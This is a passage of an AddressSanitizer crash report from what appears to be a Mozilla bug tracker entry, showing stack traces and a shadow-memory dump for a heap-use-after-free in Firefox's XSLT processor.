    #7 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #8 0x7ffe580b4b13 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:544
    #9 0x7ffe580b772e in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:589
    #10 0x7ffe5841488f in js::ToPrimitiveSlow /builds/worker/checkouts/gecko/js/src/vm/JSObject.cpp:2402
    #11 0x7ffe58778172 in js::ToStringSlow<js::CanGC> /builds/worker/checkouts/gecko/js/src/vm/StringType.cpp:2185
    #12 0x7ffe52dd7593 in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1355
    #13 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #14 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #15 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #16 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #17 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #18 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #19 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #20 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #21 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #22 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #23 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #24 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #25 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #26 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #27 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515

previously allocated by thread T0 here:
    #0 0x7ffebc467deb in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:98
    #1 0x7ffec314134d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ffe52dd21d0 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:920
    #3 0x7ffe52dd5ce7 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1210
    #4 0x7ffe4f61948b in mozilla::dom::XSLTProcessor_Binding::setParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:263
    #5 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #6 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #7 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #8 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #9 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #10 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #11 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #12 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #13 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #14 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #15 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #16 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #17 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #18 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #19 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #20 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #21 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #22 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #23 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #24 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #25 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #26 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #27 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert
Shadow bytes around the buggy address:
  0x04619cdc39a0: fd fd fa fa fd fd fd fd fa fa 00 00 00 00 fa fa
  0x04619cdc39b0: 00 00 00 00 fa fa fd fd fd fd fa fa 00 00 00 fa
  0x04619cdc39c0: fa fa 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00
  0x04619cdc39d0: 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd fa fa
  0x04619cdc39e0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 fa
=>0x04619cdc39f0: fa fa fd fd[fd]fa fa fa fd fd fd fd fa fa 00 00
  0x04619cdc3a00: 00 00 fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
  0x04619cdc3a10: 00 00 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd
  0x04619cdc3a20: fa fa 00 00 00 00 fa fa 00 00 00 fa fa fa 00 00
  0x04619cdc3a30: 00 00 fa fa fd fd fd fa fa fa fd fd fd fd fa fa
  0x04619cdc3a40: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15704==ABORTING
```

Back to Bug 1758062 Comment 0